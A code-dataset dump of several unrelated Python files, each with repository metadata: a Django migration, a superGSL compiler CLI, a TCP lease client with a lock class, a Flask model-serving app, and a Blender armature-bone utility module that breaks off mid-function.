5e8c3823a0da2b955e12c77ee3d80d179d9de1fd | 9,558 | py | Python | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | null | null | null | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | 24 | 2017-01-09T12:51:13.000Z | 2018-04-30T17:40:27.000Z | ccdb/experiments/migrations/0001_initial.py | thermokarst/ccdb-api | 01d76d75ffaaa9949991cdc3ac43b9ae388ad2a6 | [
"MIT"
] | null | null | null | from django.db import migrations, models
class Migration(migrations.Migration):
    """Schema migration for the experiments app.

    NOTE(review): the operation list contains both the initial CreateModel
    operations and later AddField/AlterField adjustments (display_name
    columns, related_name additions) — it looks like a squashed series of
    migrations; confirm before editing by hand.
    """

    dependencies = [
        ('misc', '0001_initial'),
        ('locations', '0001_initial'),
        ('collections_ccdb', '0001_initial'),
        ('species', '0001_initial'),
    ]

    operations = [
        # --- initial models -------------------------------------------------
        migrations.CreateModel(
            name='Experiment',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('name', models.CharField(max_length=150)),
                ('code', models.CharField(blank=True, max_length=10)),
                ('description', models.CharField(blank=True, max_length=255)),
                ('sort_order', models.IntegerField(blank=True, null=True)),
            ],
            options={
                'ordering': ['sort_order'],
            },
        ),
        migrations.CreateModel(
            name='Flaw',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('name', models.CharField(max_length=200, unique=True)),
                ('description', models.CharField(blank=True, max_length=255)),
                ('sort_order', models.IntegerField(blank=True, null=True)),
            ],
            options={
                'ordering': ['sort_order'],
            },
        ),
        migrations.CreateModel(
            name='ProtocolAttachment',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('protocol', models.FileField(upload_to='experiments/protocols/%Y/%m/%d')),
                ('experiment', models.ForeignKey(to='experiments.Experiment')),
            ],
        ),
        migrations.AddField(
            model_name='experiment',
            name='flaw',
            field=models.ForeignKey(to='experiments.Flaw', null=True, blank=True),
        ),
        migrations.AlterUniqueTogether(
            name='experiment',
            unique_together=set([('name', 'code')]),
        ),
        migrations.CreateModel(
            name='TreatmentType',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('code', models.CharField(blank=True, max_length=25)),
                ('treatment_type', models.CharField(blank=True, max_length=50)),
                ('placement', models.CharField(blank=True, max_length=25)),
                ('description', models.CharField(blank=True, max_length=255)),
                ('sort_order', models.IntegerField(blank=True, null=True)),
                ('experiment', models.ForeignKey(to='experiments.Experiment', null=True, blank=True)),
            ],
            options={
                'ordering': ['sort_order'],
            },
        ),
        migrations.AlterUniqueTogether(
            name='treatmenttype',
            unique_together=set([('experiment', 'name')]),
        ),
        migrations.CreateModel(
            name='Treatment',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('sex', models.CharField(max_length=25)),
                ('container', models.ForeignKey(to='misc.Container', null=True, blank=True)),
                ('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
                ('species', models.ForeignKey(to='species.Species')),
                ('study_location', models.ForeignKey(to='locations.StudyLocation')),
                ('treatment_type', models.ForeignKey(to='experiments.TreatmentType')),
            ],
        ),
        migrations.AlterUniqueTogether(
            name='treatment',
            unique_together=set([('treatment_type', 'container', 'study_location',
                                  'species', 'sex')]),
        ),
        migrations.CreateModel(
            name='TreatmentReplicate',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('setup_date', models.DateField(blank=True, null=True)),
                ('setup_time', models.TimeField(blank=True, null=True)),
                ('setup_sample_size', models.IntegerField(blank=True, null=True)),
                ('mass_g', models.FloatField(blank=True, null=True)),
                ('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
                ('treatment', models.ForeignKey(to='experiments.Treatment')),
            ],
        ),
        migrations.AlterUniqueTogether(
            name='treatmentreplicate',
            unique_together=set([('treatment', 'name', 'setup_date', 'setup_time')]),
        ),
        migrations.CreateModel(
            name='AliveDeadCount',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
                ('status_date', models.DateField()),
                ('status_time', models.TimeField(blank=True, null=True)),
                ('count_alive', models.IntegerField(blank=True, null=True)),
                ('count_dead', models.IntegerField(blank=True, null=True)),
                ('flaw', models.ForeignKey(to='experiments.Flaw', null=True, blank=True)),
                ('treatment_replicate', models.ForeignKey(to='experiments.TreatmentReplicate')),
            ],
        ),
        migrations.AlterUniqueTogether(
            name='alivedeadcount',
            unique_together=set([('treatment_replicate', 'status_date', 'status_time',
                                  'count_alive', 'count_dead')]),
        ),
        migrations.AddField(
            model_name='experiment',
            name='collections',
            field=models.ManyToManyField(to='collections_ccdb.Collection'),
        ),
        migrations.AlterModelOptions(
            name='alivedeadcount',
            options={'verbose_name': 'Alive-dead Count'},
        ),
        # --- later adjustments: display_name columns ------------------------
        migrations.AddField(
            model_name='treatmenttype',
            name='display_name',
            field=models.CharField(default='x', max_length=255, editable=False),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='treatmentreplicate',
            name='display_name',
            field=models.CharField(default='x', max_length=255, editable=False),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='treatment',
            name='display_name',
            field=models.CharField(default='x', max_length=255, editable=False),
            preserve_default=False,
        ),
        # --- later adjustments: related_name on foreign keys ----------------
        migrations.AlterField(
            model_name='alivedeadcount',
            name='flaw',
            field=models.ForeignKey(related_name='alive_dead_counts', to='experiments.Flaw', null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='alivedeadcount',
            name='treatment_replicate',
            field=models.ForeignKey(related_name='alive_dead_counts', to='experiments.TreatmentReplicate'),
        ),
        migrations.AlterField(
            model_name='experiment',
            name='flaw',
            field=models.ForeignKey(related_name='experiments', to='experiments.Flaw', null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='protocolattachment',
            name='experiment',
            field=models.ForeignKey(related_name='protocols', to='experiments.Experiment'),
        ),
        migrations.AlterField(
            model_name='treatment',
            name='container',
            field=models.ForeignKey(related_name='treatments', to='misc.Container', null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='treatment',
            name='flaw',
            field=models.ForeignKey(related_name='treatments', to='experiments.Flaw', null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='treatment',
            name='species',
            field=models.ForeignKey(related_name='treatments', to='species.Species'),
        ),
        migrations.AlterField(
            model_name='treatment',
            name='study_location',
            field=models.ForeignKey(related_name='treatments', to='locations.StudyLocation'),
        ),
        migrations.AlterField(
            model_name='treatment',
            name='treatment_type',
            field=models.ForeignKey(related_name='treatments', to='experiments.TreatmentType'),
        ),
        migrations.AlterField(
            model_name='treatmentreplicate',
            name='flaw',
            field=models.ForeignKey(related_name='treatment_replicates', to='experiments.Flaw', null=True, blank=True),
        ),
        migrations.AlterField(
            model_name='treatmentreplicate',
            name='treatment',
            field=models.ForeignKey(related_name='treatment_replicates', to='experiments.Treatment'),
        ),
        migrations.AlterField(
            model_name='treatmenttype',
            name='experiment',
            field=models.ForeignKey(related_name='treatment_types', to='experiments.Experiment', null=True, blank=True),
        ),
    ]
| 44.663551 | 120 | 0.567797 | 835 | 9,558 | 6.353293 | 0.129341 | 0.049199 | 0.051461 | 0.038454 | 0.661828 | 0.654854 | 0.552309 | 0.446937 | 0.411687 | 0.380584 | 0 | 0.008137 | 0.292844 | 9,558 | 213 | 121 | 44.873239 | 0.776742 | 0 | 0 | 0.628571 | 0 | 0 | 0.198054 | 0.035886 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004762 | 0 | 0.019048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8d831dc9c908bff516eb0907d8dffbcd80011f | 2,023 | py | Python | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | 1 | 2021-09-09T00:15:37.000Z | 2021-09-09T00:15:37.000Z | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | 43 | 2020-11-08T23:40:23.000Z | 2022-03-26T23:44:33.000Z | supergsl/sgsl.py | rmcl/supergsl | d0851ab1e2201a30ff0e8862c56fc302a686117d | [
"MIT"
] | null | null | null | """Entrypoint for the `sgsl` command used to invoke the superGSL compiler."""
import argparse
from supergsl.core.config import load_settings
from supergsl.core.pipeline import CompilerPipeline
from supergsl.core.exception import SuperGSLError
from supergsl.repl import SuperGSLShell
from supergsl.grpc.server import SuperGSLCompilerService
import pprint
def main():
    """Entry point for the `sgsl` command.

    Depending on the CLI arguments this either starts a gRPC compiler
    server, opens the interactive REPL shell, or compiles a single
    source file.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "input_file",
        help="The input source code file to process",
        type=str,
        default=None,
        nargs='?')
    parser.add_argument(
        "-l", "--listen",
        help="Start up a gRPC server.",
        default=False,
        action='store_true')
    parser.add_argument(
        "-D", "--start-shell-on-error",
        help="If an error occurs during execution of SuperGSL program then start the repl shell.",
        default=False,
        action='store_true')
    parser.add_argument(
        "-s", "--settings",
        help="Provide the path to a supergsl-config.json file.",
        default=None,
        nargs='+')
    args = parser.parse_args()

    compiler_settings = load_settings(args.settings)

    # Server mode: serve gRPC requests until the service stops, then exit.
    if args.listen:
        print('Starting gRPC compiler server.')
        service = SuperGSLCompilerService(compiler_settings)
        service.start_listening()
        print('Stopping compiler server')  # fixed typo ("Stoping")
        return

    compiler_pipeline = CompilerPipeline(compiler_settings)

    # No input file given: drop straight into the interactive shell.
    if not args.input_file:
        SuperGSLShell(compiler_pipeline).start()
        return

    print('Compiling "%s".' % args.input_file)
    with open(args.input_file, 'r') as input_file_fp:
        source_code = input_file_fp.read()
    try:
        compiler_pipeline.compile(source_code)
    except SuperGSLError:
        if args.start_shell_on_error:
            SuperGSLShell(compiler_pipeline).start()
        else:
            # Bare raise preserves the original traceback.
            raise
    print('Compiling Complete.')
if __name__ == "__main__":
main()
| 28.097222 | 98 | 0.648047 | 227 | 2,023 | 5.60793 | 0.405286 | 0.042419 | 0.053417 | 0.036135 | 0.12883 | 0.069128 | 0.069128 | 0.069128 | 0 | 0 | 0 | 0 | 0.254572 | 2,023 | 71 | 99 | 28.492958 | 0.844164 | 0.035096 | 0 | 0.254545 | 0 | 0 | 0.18705 | 0.011305 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.127273 | 0 | 0.163636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8e52b76f7627d2e5926d3d4072f9f0f9c25bb5 | 4,592 | py | Python | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | 1 | 2019-07-24T21:20:48.000Z | 2019-07-24T21:20:48.000Z | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | null | null | null | usher/tcp_client.py | lukecampbell/usher | f939c6ba3ccfdd265306cbf4752a890021473c0e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from usher.tcp_server import MessageParser
from struct import pack, unpack
import socket
import gevent.event
import gevent
import time
class UsherSocket(socket.socket):
    '''
    TCP socket that connects to (host, port) on construction and can be
    used as a context manager: the connection is closed on exit.
    '''
    def __init__(self, host, port):
        super().__init__(socket.AF_INET, socket.SOCK_STREAM)
        self.connect((host, port))

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self.close()
class UsherTCPClient:
    '''
    TCP client for the usher lease server.
    '''
    def __init__(self, host, port, timeout=10, server_blocking=False, server_timeout=0):
        self.host = host
        self.port = port
        self.timeout = timeout
        self.server_blocking = server_blocking
        self.server_timeout = server_timeout
        # Fail fast if the server isn't reachable.
        self.nop()

    def acquire_lease(self, namespace, expiration=60, server_timeout=0):
        '''
        Acquire a lease
        returns the expiration time or 0 on failure
        '''
        server_timeout = server_timeout or self.server_timeout
        with UsherSocket(self.host, self.port) as sock, gevent.timeout.Timeout(self.timeout):
            parser = MessageParser(sock)
            # Only ask the server to block when the client was configured to.
            wait_time = self.server_timeout if self.server_blocking else 0
            parser.send_acquire(namespace, expiration, wait_time)
            return parser.read_acquire_response()

    def release_lease(self, namespace, key):
        '''
        Release a lease
        returns 0 on success
        '''
        with UsherSocket(self.host, self.port) as sock, gevent.timeout.Timeout(self.timeout):
            parser = MessageParser(sock)
            parser.send_release(namespace, key)
            return parser.read_release_response()

    def nop(self):
        '''
        Send a NOP message
        returns 0 on reply
        '''
        with UsherSocket(self.host, self.port) as sock, gevent.timeout.Timeout(self.timeout):
            parser = MessageParser(sock)
            parser.send_nop()
            return parser.read_nop_response()

    def rtt(self):
        '''
        Determines round trip time (RTT) using a NOP
        '''
        start = time.time()
        self.nop()
        return time.time() - start
class UsherLock:
    '''
    A distributed lock backed by an usher lease server.

    Usage:
        usher = UsherTCPClient('localhost', 9090)
        lock = UsherLock(usher, 'my-namespace')
        with lock:
            do_something()
    '''
    def __init__(self, cli, name, blocking=True, timeout=10, acquisition_timeout=10, raise_timeout=True):
        '''
        Initialize an UsherLock
        cli                 - The UsherTCPClient
        name                - The namespace for this lock
        blocking            - Should the lock block while acquiring the lock or fail immediately
        timeout             - How long to acquire the lock for
        acquisition_timeout - How long to wait on the server
        raise_timeout       - Should a timeout be raised
        '''
        self.cli = cli
        self.name = name
        self.blocking = blocking
        self.timeout = timeout
        self.acquisition_timeout = acquisition_timeout
        self.raise_timeout = raise_timeout
        self.gevent_timeout = gevent.timeout.Timeout(self.timeout)
        self.key = None

    def acquire(self):
        '''
        Acquire the lock.

        Returns True on success, False when non-blocking and the lease is
        held elsewhere.  When blocking, raises gevent Timeout if the
        acquisition_timeout elapses.
        '''
        expiration, self.key = self.cli.acquire_lease(self.name, self.timeout)
        if expiration != 0:
            return True
        if self.blocking:
            done = gevent.event.Event()
            with gevent.timeout.Timeout(self.acquisition_timeout):
                # Poll the server once per second until the lease is granted.
                while not done.wait(1):
                    expiration, self.key = self.cli.acquire_lease(self.name, self.timeout)
                    if expiration != 0:
                        done.set()
                return True
        return False

    def release(self):
        '''
        Release the held lease, if any.

        Raises RuntimeError if the server reports a failure.
        '''
        if self.key:
            status = self.cli.release_lease(self.name, self.key)
            # release_lease returns 0 on success (see UsherTCPClient), so a
            # non-zero status is the failure case.  The previous check was
            # inverted and raised on success.
            if status != 0:
                raise RuntimeError("Couldn't release the lock")
            # Forget the key so a second release() is a no-op.
            self.key = None

    def __enter__(self):
        if not self.acquire():
            raise RuntimeError("Couldn't acquire the lock")
        if self.raise_timeout:
            self.gevent_timeout.start()
        return self

    def __exit__(self, type, value, traceback):
        self.release()
        self.gevent_timeout.cancel()
| 28.7 | 105 | 0.586237 | 527 | 4,592 | 4.963947 | 0.244782 | 0.046254 | 0.048165 | 0.045872 | 0.282875 | 0.182339 | 0.182339 | 0.182339 | 0.182339 | 0.149465 | 0 | 0.007129 | 0.327962 | 4,592 | 159 | 106 | 28.880503 | 0.84057 | 0.179443 | 0 | 0.27907 | 0 | 0 | 0.01436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.151163 | false | 0 | 0.069767 | 0.011628 | 0.360465 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e8ee0c246e72a0e714983f025577bd8e93cdeab | 860 | py | Python | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | 1 | 2022-01-12T08:22:12.000Z | 2022-01-12T08:22:12.000Z | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | null | null | null | app.py | mukesh1996-ds/Logistic-Regression- | cd564203923a2d0d042c13345924617114c6bc74 | [
"MIT"
] | null | null | null |
# importing necessary libraries and functions
import numpy as np
from flask import Flask, request, jsonify, render_template
import pickle
app = Flask(__name__)  # Initialize the flask App

# Load the trained model inside a context manager so the file handle is
# closed promptly (the original `pickle.load(open(...))` leaked it).
# NOTE: pickle.load on an untrusted file can execute arbitrary code; only
# ship a model file you produced yourself.
with open('Logistic.pickle', 'rb') as model_file:
    model = pickle.load(model_file)

@app.route('/')  # Homepage
def home():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/predict', methods=['POST'])
def predict():
    '''
    For rendering results on HTML GUI
    '''
    # Convert every submitted form field to a float and wrap the vector
    # in a list, since the model expects a 2-D input (one row).
    feature_vector = np.array([float(value) for value in request.form.values()])
    prediction = model.predict([feature_vector])
    # Render the page again with the predicted class filled in.
    return render_template('index.html', prediction_text='Predicted Class: {}'.format(prediction))
if __name__ == "__main__":
    # Start the Flask development server with the debugger enabled
    # (development use only).
    app.run(debug=True)
5e8f89e3acee541134ba922492d88302691c6512 | 130,823 | py | Python | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | utils.py | kant/valve-armature-toolkit | c7e82de5db6b98af44cd8cddc64b7ca99c96e589 | [
"MIT"
] | null | null | null | import bpy
from math import radians
from bpy.app.handlers import persistent
from . import armature_rename
from .armature_creation import armature
class Prefixes: #Container for other prefixes
    """Bone-name prefixes stripped/matched when classifying armature bones."""
    helper = 'hlp_'  # plain helper-bone prefix
    helper2 = 'ValveBiped.hlp_'  # L4D2-style helper-bone prefix
    attachment = 'ValveBiped.attachment_'  # attachment-bone prefix
    attachment2 = 'ValveBiped.Anim_'  # alternate attachment-bone prefix
    other = 'ValveBiped.'  # generic Source-engine bone prefix
##Helper prefixes##
#h1 = hlp_
#h2 = ValveBiped.hlp_
##Attachment prefixes##
#a1 = ValveBiped.attachment
#a2 = ValveBiped.Anim
##Bone prefixes##
#p1 = Current prefix
#p2 = ValveBiped.
@persistent
def create_armature(self, context):
    """Handler: (re)build the global Armature wrapper when a new target is picked."""
    scene = bpy.context.scene
    props = scene.vatproperties
    info = scene.vatinfo

    # Only act while the one-shot "creating" flag is set; consume it.
    if not info.creating_armature:
        return
    info.creating_armature = False

    target = props.target_armature
    if not target:
        info.armature_name = ''
        return

    # Nothing to do when the tracked armature is unchanged.
    if info.armature_name == target.name:
        return

    info.armature_name = ''
    info.unit = 0
    global arm
    arm = Armature(target)
    info.armature_name = target.name
@persistent
def armatures_reset(*args):
    """Handler: restore the target-armature pointer from the saved name."""
    scene = bpy.context.scene
    props = scene.vatproperties
    saved_name = scene.vatinfo.armature_name
    if saved_name:
        props.target_armature = bpy.data.objects[saved_name]
class Armature: #Armature base
    def __init__(self, armature):
        """Wrap a Blender armature object and gather its bone information.

        armature: the bpy.types.Object whose .data is the armature datablock.
        """
        vatinfo = bpy.context.scene.vatinfo
        #Basic armature information
        self.armature = armature
        self.armature_real = armature.data
        #Additional armatures
        self.weight_armature = None
        self.weight_armature_real = None
        self.animation_armature = None
        self.animation_armature_real = None
        #Functions executed to gather armature information
        # The flag is get_bones' `report` argument; it is True only when no
        # armature was previously tracked (vatinfo.armature_name is empty).
        if vatinfo.armature_name:
            self.get_bones(False)
        else:
            self.get_bones(True)
        # scheme stays -1 when get_bones found no recognizable bones, in
        # which case the rest of the setup is skipped.
        if vatinfo.scheme != -1:
            self.get_unit()
            self.get_armatures()
            self.get_constraints()
            self.set_groups()
            if self.helper_bones:
                self.set_helper_bones()
        else:
            print("Empty armature, cannot proceed")
def get_bones(self, report): #Builds bone lists
vatproperties = bpy.context.scene.vatproperties
vatinfo = bpy.context.scene.vatinfo
armature = self.armature
if self.armature:
#Cleans bone list
self.full_bonelist = []
self.symmetrical_bones = {'arms': {'clavicle': [], 'upperarm': [], 'forearm': [], 'hand': []}, 'legs': {'thigh': [], 'calf': [], 'foot': [], 'toe0': []}, 'fingers': {'finger0': [], 'finger01': [], 'finger02': [], 'finger1': [], 'finger11': [], 'finger12': [], 'finger2': [], 'finger21': [], 'finger22': [], 'finger3': [], 'finger31': [], 'finger32': [], 'finger4': [], 'finger41': [], 'finger42': []}}
self.central_bones = {'pelvis': [], 'spine': [], 'spine1': [], 'spine2': [], 'spine3': [], 'spine4': [], 'neck': [], 'head': []}
self.helper_bones = {'arms': {'trapezius': [], 'shoulder': [], 'bicep': [], 'elbow': [], 'ulna': [], 'wrist': []}, 'legs': {'quadricep': [], 'knee': []}, 'viewmodel': {'thumbroot': [], 'thumbfix': [], 'wrist_helper1': [], 'wrist_helper2': [], 'forearm_driven': [], 'ulna_extra1': [], 'ulna_extra2': [], 'wrist_extra': []}, 'others': {'others': []}}
self.other_bones = {'forward': [], 'weapon': [], 'attachment': [], 'viewmodel': [], 'root': [], 'others': []}
self.custom_bones = {'jiggle': [], 'others': []}
self.full_bonelist = armature.data.bones.keys() #Gets all bones in armature
#Checks if bone list is empty
if self.full_bonelist:
symmetrical_bones_raw = []
central_bones_raw = []
helper_bones_raw = []
other_bones_raw = []
custom_bones_raw = []
self.side = []
helper_bones = []
central_bones = []
vatinfo.prefix = ''
vatinfo.sbox = False
vatinfo.goldsource = False
vatinfo.titanfall = False
vatinfo.sfm
vatinfo.viewmodel = False
vatinfo.special_viewmodel = False
for bone in self.full_bonelist:
marked = False
#Helper prefix
if bone.startswith('hlp_'):
helper_bones_raw.append(bone.replace(Prefixes.helper, 'h1'))
continue
##Source##
elif bone.startswith('ValveBiped.'):
if not vatinfo.special_viewmodel:
vatinfo.prefix = 'ValveBiped.Bip01_'
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['ulna', 'wrist', 'elbow', 'knee', 'trapezius', 'quad', 'bicep', 'shoulder', 'thumbroot']
central_bones = []
#Dumb leftover bone with no purpose in some Titanfall armatures
if vatinfo.titanfall:
self.custom_bones['others'].append('p2.' + bone.replace('ValveBiped.', ''))
continue
#L4D2 helper prefix, uses 'h2' prefix
if bone.startswith('ValveBiped.hlp_'):
helper_bones_raw.append(bone.replace('ValveBiped.hlp_', 'h2.'))
continue
#Attachment bone prefixes
elif bone.startswith('ValveBiped.attachment'):
other_bones_raw.append(bone.replace('ValveBiped.attachment_', 'a1.'))
continue
elif bone.startswith('ValveBiped.Anim'):
other_bones_raw.append(bone.replace('ValveBiped.Anim_', 'a2.'))
continue
elif bone == 'ValveBiped.ValveBiped':
vatinfo.viewmodel = True
self.other_bones['root'].append(bone.replace(Prefixes.other, 'p2.'))
continue
elif bone == 'ValveBiped.bip_root' or bone == 'ValveBiped.bip_base':
vatinfo.prefix = 'ValveBiped.bip_'
vatinfo.viewmodel = True
vatinfo.special_viewmodel = True
self.other_bones['root'].append(bone.replace(vatinfo.prefix, 'p1.'))
continue
##Source Filmmaker (Not supported currently)##
elif bone.startswith('bip_') and not vatinfo.special_viewmodel:
vatinfo.sfm = True
vatinfo.prefix = 'bip_'
##Gold Source##
elif bone.title().startswith('Bip0') or bone.count('Bone') or bone.count('Dummy'):
vatinfo.goldsource = True
self.side = [' L ', ' R ', ' L', ' R']
helper_bones = []
central_bones = []
if bone.title().startswith('Bip01'):
vatinfo.prefix = 'Bip01'
elif bone.title().startswith('Bip02'):
vatinfo.prefix = 'Bip02'
if bone == vatinfo.prefix:
self.other_bones['root'].append(bone)
continue
##S&Box##
elif vatinfo.sbox or self.full_bonelist.count('root_IK'):
vatinfo.sbox = True
vatinfo.prefix = ''
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['twist', 'helper']
central_bones = ['pelvis', 'spine_0', 'spine_1', 'spine_2', 'neck_0', 'head']
if bone.casefold().count('ik'):
other_bones_raw.append(bone)
continue
elif bone.casefold().count('face') or bone.casefold().count('eye'):
custom_bones_raw.append(bone)
continue
##Titanfall##
elif bone.startswith('def') or bone.startswith('ja') or bone.startswith('jx'):
vatinfo.titanfall = True
vatinfo.prefix = 'def_'
self.side = ['L_', 'R_', '_L', '_R']
helper_bones = ['forearm', 'elbowb', 'kneeb', 'shouldermid', 'shouldertwist']
central_bones = []
#Root bone
if bone == 'jx_c_delta':
self.other_bones['root'].append(bone)
continue
#Attachments/#Special bones
elif bone.startswith('ja') or bone.startswith('jx'):
other_bones_raw.append(bone)
continue
else:
self.side = ['L_', 'R_', '_L', '_R']
#Central bone set if defined
if central_bones:
for central in central_bones:
if bone.casefold().count(central):
if vatinfo.prefix:
central_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
central_bones_raw.append(bone)
marked = True
break
#Helper bone set
if helper_bones:
for helper in helper_bones:
if bone.casefold().count(helper):
if vatinfo.prefix:
helper_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
helper_bones_raw.append(bone)
marked = True
break
if marked:
continue
if bone.startswith(vatinfo.prefix) or vatinfo.special_viewmodel:
bone2 = bone.replace(vatinfo.prefix, '').title()
if bone.casefold().count('weapon') or bone.casefold().count('gun') or bone.casefold().count('missile'):
if vatinfo.prefix:
other_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
other_bones_raw.append(bone)
continue
#Default prefix
elif bone2.startswith(self.side[0]) or bone2.startswith(self.side[1]): #Symmetrical
vatinfo.scheme = 0
if vatinfo.prefix:
symmetrical_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
symmetrical_bones_raw.append(bone)
continue
#Blender Friendly prefix
elif bone2.endswith(self.side[2]) or bone2.endswith(self.side[3]):
vatinfo.scheme = 1
if vatinfo.prefix:
symmetrical_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
else:
symmetrical_bones_raw.append(bone)
continue
elif vatinfo.prefix:
central_bones_raw.append(bone.replace(vatinfo.prefix, 'p1.'))
continue
if bone.startswith(Prefixes.other):
other_bones_raw.append(bone.replace(Prefixes.other, 'p2.'))
continue
##No/Different prefix##
custom_bones_raw.append(bone)
#Empty armature
if not symmetrical_bones_raw and not central_bones_raw and not self.other_bones:
vatinfo.scheme = -1
###Organizes dictionary from raw lists###
##Symmetrical bones##
if symmetrical_bones_raw:
#Bone list order:
#arms = clavicle, upperarm, forearm, hand
#legs = thigh, calf, foot, toe0
#fingers = finger0, finger01, finger02, finger1, finger11...
for bone in symmetrical_bones_raw:
#L4D special infected viewmodel
if vatinfo.special_viewmodel:
arms = ['Collar', 'Upperarm', 'Lowerarm', 'Hand']
legs = []
fingers = ['thumb_0', 'thumb_1', 'thumb_2', 'index_0', 'index_1', 'index_2', 'middle_0', 'middle_1', 'middle_2', 'ring_0', 'ring_1', 'ring_2', 'pinky_0', 'pinky_1', 'pinky_2']
#Gold Source
elif vatinfo.goldsource:
arms = ['Arm', 'Arm1', 'Arm2', 'Hand']
legs = ['Leg', 'Leg1', 'Foot', None]
fingers = ['Finger0', 'Finger01', 'Finger02', 'Finger1', 'Finger11', 'Finger12', 'Finger2', 'Finger21', 'Finger22', 'Finger3', 'Finger31', 'Finger32', 'Finger4', 'Finger41', 'Finger42']
if bone.title().count('Toe'):
if bone.title().count('Toe02'):
self.symmetrical_bones['legs'].setdefault('toe02', [])
self.symmetrical_bones['legs']['toe02'].append(bone)
self.symmetrical_bones['legs']['toe02'].sort()
continue
elif bone.title().count('Toe01'):
self.symmetrical_bones['legs'].setdefault('toe01', [])
self.symmetrical_bones['legs']['toe01'].append(bone)
self.symmetrical_bones['legs']['toe01'].sort()
continue
elif bone.title().count('Toe12'):
self.symmetrical_bones['legs'].setdefault('toe12', [])
self.symmetrical_bones['legs']['toe12'].append(bone)
self.symmetrical_bones['legs']['toe12'].sort()
continue
elif bone.title().count('Toe11'):
self.symmetrical_bones['legs'].setdefault('toe11', [])
self.symmetrical_bones['legs']['toe11'].append(bone)
self.symmetrical_bones['legs']['toe11'].sort()
continue
elif bone.title().count('Toe1'):
self.symmetrical_bones['legs'].setdefault('toe1', [])
self.symmetrical_bones['legs']['toe1'].append(bone)
self.symmetrical_bones['legs']['toe1'].sort()
continue
#Titanfall
elif vatinfo.titanfall:
arms = ['Clav', 'Shoulder', 'Elbow', 'Wrist']
legs = ['Thigh', 'Knee', 'Ankle', 'Ball']
fingers = ['finThumbA', 'finThumbB', 'finThumbC', 'finIndexA', 'finIndexB', 'finIndexC', 'finMidA', 'finMidB', 'finMidC', 'finRingA', 'finRingB', 'finRingC', 'finPinkyA', 'finPinkyB', 'finPinkyC']
if bone.count('Carpal'):
self.symmetrical_bones['fingers'].setdefault('fingercarpal', [])
self.symmetrical_bones['fingers']['fingercarpal'].append(bone)
self.symmetrical_bones['fingers']['fingercarpal'].sort()
continue
elif bone.count('thighLow'):
